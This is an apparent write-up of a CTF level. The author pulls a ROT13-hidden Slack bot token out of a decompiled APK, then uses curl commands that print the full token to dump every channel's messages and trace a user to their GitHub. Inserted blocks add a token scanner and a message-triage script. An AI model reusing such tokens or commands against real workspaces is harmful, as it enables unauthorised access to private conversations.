Level 11 – Hackoween II #ZomatoCTF

Insert ChatGPT code? No. The level is called – Instant Gratification

This level gave an APK and a form to submit the code.

Download and decompile the APK file. I use JADX-GUI.

There is a leaked Slack API token.

It is ROT13-encoded, as the code suggests.

Back to CyberChef to ROT13-decode the token.
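The same finding, turned into a check a defender can run over a decompiled APK tree: the scanner below looks for Slack-shaped tokens in every source line both as written and after ROT13 decoding, so a token hidden the way this APK hid it is still reported. This is an added example, not code from the writeup or from the CTF; the token regex is an assumption based on the token format shown above, and the embedded Java fragment and its all-zero placeholder token are constructed.

```python
import codecs
import re
from pathlib import Path

# Slack bot/user token shape: xox<type>-<digits>-<digits>-<24 alphanumerics>.
# The pattern is an assumption derived from the token format seen in this writeup.
SLACK_TOKEN_RE = re.compile(r"xox[abpsr]-[0-9]{10,13}-[0-9]{10,13}-[A-Za-z0-9]{24}")

# Constructed decompiled-source fragment. The token inside is a placeholder
# (all-zero digits, letters spelling EXAMPLE) stored ROT13-encoded, which is
# the same trick the APK in this level used.
SAMPLE_SOURCE = """\
public final class Config {
    static final String API_BASE = "https://slack.com/api/";
    static final String TOKEN = "kbko-000000000000-000000000000-RKNZCYRrknzcyrRKNZCYRrkn";
}
"""


def find_slack_tokens(text):
    """Return (line_number, encoding, token) for each Slack-shaped token in text.

    Every line is checked as-is and again after ROT13 decoding, so a token
    obfuscated with ROT13 is reported in its decoded (usable) form.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        candidates = (("plain", line), ("rot13", codecs.decode(line, "rot_13")))
        for encoding, candidate in candidates:
            for match in SLACK_TOKEN_RE.finditer(candidate):
                findings.append((lineno, encoding, match.group(0)))
    return findings


def scan_tree(root, suffixes=(".java", ".kt", ".smali", ".xml", ".json")):
    """Walk a decompiled-APK directory (e.g. JADX output) and scan source-like files.

    Returns {file_path: [(line_number, encoding, token), ...]} for files with hits.
    """
    results = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in suffixes:
            hits = find_slack_tokens(path.read_text(errors="replace"))
            if hits:
                results[str(path)] = hits
    return results


if __name__ == "__main__":
    # Stand-alone run over the constructed fragment; point scan_tree at a
    # real decompiled directory to check an actual build before release.
    for lineno, enc, tok in find_slack_tokens(SAMPLE_SOURCE):
        print(f"line {lineno}: {enc}: {tok}")
```

Run `scan_tree("path/to/jadx-output")` as a pre-release or CI step; a hit in `rot13` form is exactly the pattern that made this level solvable, and the fix is to move the secret out of the client entirely rather than to rotate it by another 13 letters.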

Used this token to list all channels.

curl "https://slack.com/api/conversations.list" -H 'Authorization: Bearer xoxb-5729419145606-5750052480419-NCuEloorjXP8vW3AWyprQWRb' -o channels.json

Too many channels to read one by one. Now get all the messages in all channels.

cat channels.json | jq '.channels[].id' | xargs -I {} -P 10 curl "https://slack.com/api/conversations.history?channel={}&pretty=1" -H 'Authorization: Bearer xoxb-5729419145606-5750052480419-NCuEloorjXP8vW3AWyprQWRb' -o channel-chat-{}.json

This pipeline pulls every channel id out of channels.json with jq, then runs up to ten curl requests in parallel against conversations.history, saving each channel's messages to its own channel-chat-<id>.json file.

A lot of the messages are from the bot user U05N6PBAFEJ. Let's filter those out.

cat channel-chat-* | jq '.messages[]|select(.user != "U05N6PBAFEJ")' > all.json

all.json now holds all the messages by members of that Slack workspace, and they have shared some files.
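The triage done above with jq (drop the bot, then work out who shared which file in which channel), as an added example that is not part of the writeup: it joins the channel list with each channel's history so every shared file is attributed to an uploader and a channel name. The channel ids, user ids, file ids and messages below are constructed stand-ins for the channels.json and channel-chat-<id>.json files the commands above produce; only the field names follow the Slack response shape the writeup relies on.

```python
import json
from collections import Counter

# Constructed stand-in for channels.json (conversations.list output).
CHANNELS_JSON = json.dumps({"ok": True, "channels": [
    {"id": "C0000000001", "name": "general"},
    {"id": "C0000000002", "name": "random"},
]})

# Constructed stand-ins for channel-chat-<id>.json (conversations.history output),
# keyed by channel id. One user is a noisy bot, one human shares files.
HISTORY_JSON = {
    "C0000000001": json.dumps({"ok": True, "messages": [
        {"type": "message", "user": "UBOT0000000", "text": "bot noise 1"},
        {"type": "message", "user": "UBOT0000000", "text": "bot noise 2"},
        {"type": "message", "user": "UHUMAN00001", "text": "see attached",
         "files": [{"id": "FEXAMPLE001", "name": "flag_txt.txt"}]},
    ]}),
    "C0000000002": json.dumps({"ok": True, "messages": [
        {"type": "message", "user": "UHUMAN00002", "text": "hi"},
        {"type": "message", "user": "UHUMAN00001", "text": "notes",
         "files": [{"id": "FEXAMPLE002", "name": "notes.pdf"}]},
    ]}),
}

# Bot user ids to drop, the same role U05N6PBAFEJ played in the real workspace.
BOT_USERS = {"UBOT0000000"}


def load_channel_names(channels_json):
    """Map channel id -> channel name from a conversations.list response."""
    return {c["id"]: c["name"] for c in json.loads(channels_json)["channels"]}


def human_messages(history_json, bot_users):
    """Messages from a conversations.history response, minus known bot users."""
    messages = json.loads(history_json).get("messages", [])
    return [m for m in messages if m.get("user") not in bot_users]


def triage(channels_json, history_by_channel, bot_users):
    """Return (messages per human user, list of shared files with uploader and channel)."""
    names = load_channel_names(channels_json)
    per_user = Counter()
    files = []
    for channel_id, history in history_by_channel.items():
        for msg in human_messages(history, bot_users):
            per_user[msg.get("user", "?")] += 1
            for f in msg.get("files", []):
                files.append({
                    "file_id": f.get("id"),
                    "name": f.get("name"),
                    "uploader": msg.get("user"),
                    "channel": names.get(channel_id, channel_id),
                })
    return per_user, files


def who_shared(files, file_name):
    """Uploader id of the first shared file with the given name, or None."""
    for f in files:
        if f["name"] == file_name:
            return f["uploader"]
    return None


if __name__ == "__main__":
    per_user, files = triage(CHANNELS_JSON, HISTORY_JSON, BOT_USERS)
    for user, count in per_user.most_common():
        print(f"{user}: {count} messages")
    for f in files:
        print(f"#{f['channel']}: {f['name']} ({f['file_id']}) shared by {f['uploader']}")
```

To run it against the real export, replace the constructed strings with the contents of channels.json and the channel-chat-*.json files; the per-user count is the quickest way to spot which members are worth a closer look, and the file list answers the "who shared this file?" question directly.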

But the hint is in flag_txt.txt

curl -H 'Authorization: Bearer xoxb-5729419145606-5750052480419-NCuEloorjXP8vW3AWyprQWRb' https://files.slack.com/files-pri/T05MFCB49HU-F0

Who shared this file? User U05ND262075

Using the Slack API, found out the username udhaya.prakash. Found his GitHub and Gist and got access to the Gist mentioned in flag_txt.txt.


Ran the JavaScript code in the Gist and found the flag XNYTH&6GjgSj7Z.

Submitted it in the form and got the flag.
